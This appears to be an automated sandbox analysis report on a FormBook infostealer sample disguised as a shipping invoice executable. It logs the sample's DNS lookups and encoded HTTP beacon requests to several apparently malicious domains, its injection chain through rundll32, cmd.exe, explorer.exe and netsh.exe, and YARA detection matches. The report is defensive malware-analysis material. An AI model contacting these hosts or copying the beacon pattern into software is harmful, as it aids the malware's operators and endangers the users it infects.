                                                                                                                                  Nov 26, 2020 15:08:28.826474905 CET8.8.8.8192.168.2.40x3f4bNo error (0)mehler.photography192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:33.917606115 CET8.8.8.8192.168.2.40xb2aName error (3)www.uyieoamejus2zd.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET8.8.8.8192.168.2.40xef12No error (0)www.thelonerangernews.comthelonerangernews.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:39.006593943 CET8.8.8.8192.168.2.40xef12No error (0)thelonerangernews.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET8.8.8.8192.168.2.40xeae2No error (0)www.hvcharging.comhvcharging.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:44.338299990 CET8.8.8.8192.168.2.40xeae2No error (0)hvcharging.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET8.8.8.8192.168.2.40x2278No error (0)www.jddq888.comjddq888.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:49.533351898 CET8.8.8.8192.168.2.40x2278No error (0)jddq888.com23.88.85.105A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:08:54.973221064 CET8.8.8.8192.168.2.40x2c83No error (0)www.wtmailer15.com75.126.100.11A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET8.8.8.8192.168.2.40x8642No error (0)www.wastie.clubwastie.clubCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:00.309253931 CET8.8.8.8192.168.2.40x8642No error (0)wastie.club95.215.210.10A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET8.8.8.8192.168.2.40x460cNo error (0)www.gettingthehelloutofca.comgettingthehelloutofca.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:05.633838892 CET8.8.8.8192.168.2.40x460cNo error (0)gettingthehelloutofca.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET8.8.8.8192.168.2.40x26fcNo error (0)www.caelaabadie.comcaelaabadie.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:10.996421099 CET8.8.8.8192.168.2.40x26fcNo error (0)caelaabadie.com165.227.229.15A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.33.2.79A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com198.58.118.167A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.33.23.183A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com96.126.123.244A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.56.79.23A (IP address)IN (0x0001)
                                                                                                                                  Nov 26, 2020 15:09:16.707619905 CET8.8.8.8192.168.2.40xc857No error (0)www.mapnimbis.com45.79.19.196A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • www.carnesveymacr.com
                                                                                                                                  • www.mehler.photography
                                                                                                                                  • www.thelonerangernews.com
                                                                                                                                  • www.hvcharging.com
                                                                                                                                  • www.jddq888.com
                                                                                                                                  • www.wtmailer15.com
                                                                                                                                  • www.wastie.club
                                                                                                                                  • www.gettingthehelloutofca.com
                                                                                                                                  • www.caelaabadie.com

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.449764192.0.78.2480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:23.752765894 CET1403OUTGET /mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.carnesveymacr.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:23.769018888 CET1403INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.carnesveymacr.com/mqgf/?1bz=hhd0GaXlZugFYZhq3yiAARtiWhMpNMVDAm1bIlTaIe3aIDvqoSX91Ws6MgCgWpSSj5gE&v2Jx9=0pY0Q8thwtJli0y0
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.449765192.0.78.2480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:28.844275951 CET1404OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS HTTP/1.1
                                                                                                                                  Host: www.mehler.photography
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:28.860582113 CET1405INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 162
                                                                                                                                  Connection: close
                                                                                                                                  Location: https://www.mehler.photography/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=YSPUSffqOivhj8Kjp9aQgNvPQF5V6gVVRQ45a2ufWFuMe0FJpEVxFN190mcOe42QTAaS
                                                                                                                                  X-ac: 2.hhn _dfw
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  2192.168.2.44976634.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:39.024245024 CET1406OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=Nu/G71QL4p4BT86mcqNaj5MI96K7Vz5eVXtDqKTsfKVXKjxrmX+SwuyoO8XqTg4wxzHG HTTP/1.1
                                                                                                                                  Host: www.thelonerangernews.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:39.139292955 CET1406INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:39 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fbfb454-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  3192.168.2.44976734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:44.356384993 CET1409OUTGET /mqgf/?1bz=hQvvPGE3muAzcBcpOXnjuQwkQGZsNu5C1c7nvvAMRpq5p952PPZlPGy2DG7Zpy1FuWTU&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.hvcharging.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:44.471837997 CET1409INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:44 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  4192.168.2.44976823.88.85.10580C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:49.702579021 CET1410OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=mdpH1kYH/WNDw93QqiOdsAZgQKB+qpRxGfGsjxdQlClZxNZ4TMvv4sve4+Kmt2Uc5176 HTTP/1.1
                                                                                                                                  Host: www.jddq888.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:49.871308088 CET1410INHTTP/1.1 500 Internal Server Error
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Server: Microsoft-IIS/7.5
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:46 GMT
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 57
                                                                                                                                  Data Raw: e6 97 a0 e6 b3 95 e6 98 be e7 a4 ba e9 a1 b5 e9 9d a2 ef bc 8c e5 9b a0 e4 b8 ba e5 8f 91 e7 94 9f e5 86 85 e9 83 a8 e6 9c 8d e5 8a a1 e5 99 a8 e9 94 99 e8 af af e3 80 82
                                                                                                                                  Data Ascii:


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  5192.168.2.44976975.126.100.1180C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:08:55.111057997 CET1411OUTGET /mqgf/?1bz=o6fJD+zMZxVzOfk4IEdwtZQvSv9vl5cBPUt1QiawFeZ3y3tXUJIXw0nGuJCyWZvSLK28&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.wtmailer15.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:08:55.246997118 CET1412INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 26 Nov 2020 14:08:55 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 146
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  6192.168.2.44977095.215.210.1080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:00.427666903 CET1413OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=uH4Dxo5rCetYkfO7KLYRcfVECb5esRD5h1WtuccCG6pO/xNVWEKD01dxTzpIBP2UrYly HTTP/1.1
                                                                                                                                  Host: www.wastie.club
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:00.543806076 CET1414INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:00 GMT
                                                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                                                                                  Content-Length: 203
                                                                                                                                  Connection: close
                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 71 67 66 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.44977134.102.136.18080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:05.652915001 CET1415OUTGET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
                                                                                                                                  Host: www.gettingthehelloutofca.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:05.767719984 CET1415INHTTP/1.1 403 Forbidden
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:05 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 275
                                                                                                                                  ETag: "5fb7c734-113"
                                                                                                                                  Via: 1.1 google
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.449772165.227.229.1580C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Nov 26, 2020 15:09:11.027050972 CET1417OUTGET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1
                                                                                                                                  Host: www.caelaabadie.com
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  Nov 26, 2020 15:09:13.298913956 CET1417INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Date: Thu, 26 Nov 2020 14:09:11 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                  X-Redirect-By: WordPress
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Location: http://caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  Analysis Process: Shipping INVOICE-BL Shipment..exe PID: 2792 Parent PID: 5812

                                                                                                                                  General

                                                                                                                                  Start time:15:07:08
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:438107 bytes
                                                                                                                                  MD5 hash:579BA39B6A146080EF6481591440E445
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: rundll32.exe PID: 1748 Parent PID: 2792

                                                                                                                                  General

                                                                                                                                  Start time:15:07:09
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:rundll32.exe Prehnite,Lychnises
                                                                                                                                  Imagebase:0xd30000
                                                                                                                                  File size:61952 bytes
                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: cmd.exe PID: 6360 Parent PID: 1748

                                                                                                                                  General

                                                                                                                                  Start time:15:07:16
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe
                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                  File size:232960 bytes
                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: explorer.exe PID: 3424 Parent PID: 6360

                                                                                                                                  General

                                                                                                                                  Start time:15:07:30
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:
                                                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: netsh.exe PID: 4768 Parent PID: 3424

                                                                                                                                  General

                                                                                                                                  Start time:15:07:44
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                  Imagebase:0x9f0000
                                                                                                                                  File size:82944 bytes
                                                                                                                                  MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
